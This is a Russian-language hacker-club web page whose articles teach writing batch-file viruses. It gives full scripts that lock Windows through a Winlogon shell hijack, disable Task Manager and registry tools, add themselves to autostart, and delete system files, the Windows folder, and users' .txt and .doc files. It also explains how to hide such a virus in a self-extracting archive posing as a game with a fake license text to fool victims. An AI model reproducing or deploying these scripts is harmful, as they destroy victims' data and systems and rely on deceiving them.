Понедельник, 06.04.2026, 12:59
Клуб Хакеров Вступай!!!
Приветствую Вас Гость | RSS
Главная Каталог статей Регистрация Вход
I made this widget at MyFlashFetish.com.

Меню хакера:)

Категории раздела
Пишем бат вирусы [5]
Сдесь вы можете найти различные бат вирусы

Наш тупенький чат

Наш опрос
Ну что можно сказать?
Всего ответов: 82

Block title
Block content

Форма входа

Skype:bill-clinton5

Copyright © OnLy*KiLL-ClaN CSS

Главная » Статьи » Пишем бат вирусы

В категории материалов: 5
Показано материалов: 1-5

Сортировать по: Дате · Названию · Рейтингу · Комментариям · Просмотрам
Берём уже заранее заготовленный вирус (ну допустим который выключает комп после его запуска), оттаскиваем в открытое окно архиватор и бросаем его туда.

Тут же вылетает окно «Имя и параметры архива» тут можно указать «Степень сжатия» указать «Имя архива» а мы просто ставим галочку на квадратик «Создать SFX-архив» (можно тут же заметить, что расширение меняется на .exe это значит, что мы делаем настоящее приложение!)
Переходим на вкладку «Дополнительно» и нажимаем кнопку «Параметры SFX» вылетает окошко «Дополнительные параметры SFX»

Под полем «Путь для распаковки» можно поставить, чтобы ваш файл распаковался в папку «Program Files» или создать его в «Текущей папке» то есть там, где будет запущен наш вирус, в самом поле «Путь для распаковки»можно даже не чего и не писать. А вот в поле «Выполнить после распаковки» надо написать имя нашего файла с расширением, например: virus.bat (вот собаки ещё расширение им указывай! Кстати это мы сделали, для того чтобы непосредственно, после того как мы откроем (архив) вирус он автоматически запуститься, и отключал систему, или там сотрет, что-нибудь «ненужное»).
Теперь мы добавим наш вирус в папку «Автозагрузка» Переключаемся на вкладке «Дополнительно» нажимаем кнопку «Добавить ярлык…» вылетает новое окно, где написано «Место создания ярлыка»

ставим пометку «В папке Автозагрузка» (можно и в «Меню Пуск» и «На рабочем столе» но нам надо, чтобы при включении комп вырубался снова ведь так).
И поэтому когда при следующей загрузке компа система начнёт загружать элементы «Автозагрузки» то само собой загрузит, и наш файл и делать нечего отключит комп снова! (Правда обводка тут слишком проста, когда идёт сама загрузка, просто держите нажатой клаву «Shift» и ком автоматически обойдёт элементы «Автозагрузки» и соответственно не отключиться, но не все это знают!)
В поле «Имя файла, для которого будет создан ярлык» пишем имя нашего файла, например virus.bat ну и ещё и в поле «Имя ярлыка (файла .lnk):» пишем, что вашей душе угодно (можно конечно написать что-нибудь такое типа: «Microsoft» или «Intel» и тогда это будет выглядеть более убедительно чем «Отключение») и всё, больше не чего не пишите разве можно написать в поле «Описание ярлыка», что-нибудь такое: «Not to delete» или «System file» ну чтобы придать немного сомнения. Подтверждаем ОК.

На вкладке «Режимы» где написано «Режим ввода информации» можно поставить пометку «Скрыть всё» и тогда при распаковки ни кто не чего у вас не спросит, а просто распакует и всё.
Тут все зависит от вашего вируса. Если он предназначен чтобы один раз запуститься убить все в чертям и все то лучше конечно выбрать «Скрыть все» а если же вы собираетесь маскировать ваш вирус под игру (Которую запакуете вместе с вирусом) и чтобы вирус долгое время сидел на компьютере вашей жертвы и например забивал по тихоньку место мусором то можно поставить галку на пункте «Не показывать начальный диалог» и тогда наша программа ни будет нас спрашивать, куда установить наш файл, а просто покажет лицензию, которую мы с вами сейчас и напишем. Ну для того чтобы установка нашего вируса шла как обычная программа и жертва нечего не заподозрила.

На странице «Лицензия» в поле «Заголовок окна с лицензией» пишем название, например «Игра» если вы косите под игру, или «Super game» В общем сами придумайте. В поле «Текст лицензии» вешаем лапшу на уши и даём волю своей фантазии ну, например:
Сейчас работает мастер установки игры «pirate». Это длительный процесс и отмена операции может повредить. Пожалуйста внимательно прочитайте, что будет написано ниже для полноправного использования данной продукцией:…тру ля ля.…ля ля… Ну там лечите дальше сколько душе угодно, это для того чтобы не оставить не малейшего сомнения на счёт происхождения и назначения программы, и вот ещё пожалуйста пишите без ошибок, а то вас тут же раскусят! Ну или просто-напросто скопируйте соглашения из любой другой программы все равно их не кто не читает.

На странице «Т
Пишем бат вирусы | Просмотров: 3508 | Добавил: kiks | Дата: 13.04.2012 | Комментарии (0)

блокировка системы
Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!

@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус...
title Внимание!!!
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 » C:\0.reg
ECHO. » C:\0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] » C:\0.reg
ECHO. » C:\0.reg
ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " » C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO @echo off »C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe »C:\windows\boot.bat
ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f »C:\windows\boot.bat
ECHO start sys.bat »C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if "%choise%" == "101" goto gold
if "%choise%" == "200393" goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
:end

Добавляет программу в автозагрузку ОС

copy ""%0"" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Пишем бат вирусы | Просмотров: 4920 | Добавил: kiks | Дата: 13.04.2012 | Комментарии (5)

Вирус который убивает Винду. Не проверяйте на своем компьютере=)
открываем блокнот копируем и сохраняем как bat маскируем через wivar см.ниже

@echo This virus created by Ruslik
@echo Virus: pcforumhack.ruTM Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") » %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")»%temp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:\ntldr",1 » %temp%\temp.vbs
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:\Windows",1 » %temp%\temp.vbs
echo fso.deletefolder "I:\Windows",1 » %temp%\temp.vbs
echo fso.deletefolder "C:\Windows",1 » %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") » %temp%\temp.vbs
echo fso.deletefile sr+"\system32\hal.dll",1 » %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") » %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\dllcache",1 » %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") » %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\drives",1 » %temp%\temp.vbs
echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ruTM"»%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ruTM"»%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ruTM"»%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")»%temp%\temp1.vbs
echo do»%temp%\temp1.vbs
echo fso.getfile ("A:\")»%temp%\temp1.vbs
echo loop»%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject("Wscript.Shell") » %temp%\temp2.vbs
echo do»%temp%\temp2.vbs
echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True"»%temp%\temp2.vbs
echo loop»%temp%\temp2.vbs
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Mic
Пишем бат вирусы | Просмотров: 3424 | Добавил: kiks | Дата: 13.04.2012 | Комментарии (2)

Открываем блокнот пишем
Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js
echo WSHShell.Popup ("ПИШИ СЮДА ЧТО УГОДНО"); » %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js

Добавь этот скрипт в свой вирус, вместо «ПИШИ СЮДА ЧТО УГОДНО» напиши свой текст (например, предсмертную речь для юзера:) ), и при запуске вируса вылезет окошечко с твоим сообщением!
и сохраняем с расширением Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js
echo WSHShell.Popup ("ПИШИ СЮДА ЧТО УГОДНО"); » %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js

Добавь этот скрипт в свой вирус, вместо «ПИШИ СЮДА ЧТО УГОДНО» напиши свой текст (например, предсмертную речь для юзера:) ), и при запуске вируса вылезет окошечко с твоим сообщением!
сохраняем как .bat
и маскируем с нормальным ярлыком и с расширением exe
Пишем бат вирусы | Просмотров: 730 | Добавил: kiks | Дата: 13.04.2012 | Комментарии (0)

Итак пример простейшего вируса который можно написать за 1 минуту. Пусть программа с расширением "Ват" называется "JKL"(JKL.bat).
Пример 1 Пример 2
COPY JKL.bat C:\JKL.Bat

COPY JKL.bat C:\Windows\FIFA.bat

del C:\*.sys

del: C:\Command.com

del: C:\Windows\*.exe

del: JKL.bat mode con codepage prepare=((866) C:\WINDOWS\COMMAND\ega3.cpi)

mode con codepage select=866keyb ru,,C:\WINDOWS\COMMAND\keybrd3.sys

COPY JKL.bat C:\Autoexec.Bat

COPY C:\Autoexec.bat С:\Windows\JKL.bat

COPY C:\Autoexec.bat C:\Windows\System32\Autoexec.bat

dir >C:\Dzeran.boom.ru.htm

del C:\*.txt

del: C:\*.doc

del: C:\Windows\*.exe

del: JKL.bat

Это вписываем в обычный текстовый файл и сохраняем под именем JKL.bat
Пишем бат вирусы | Просмотров: 1838 | Добавил: kiks | Дата: 13.04.2012 | Комментарии (1)

Поиск на сайте

Block title
хуйня не могу убрать

Copyright MyCorp © 2026 Бесплатный хостинг uCoz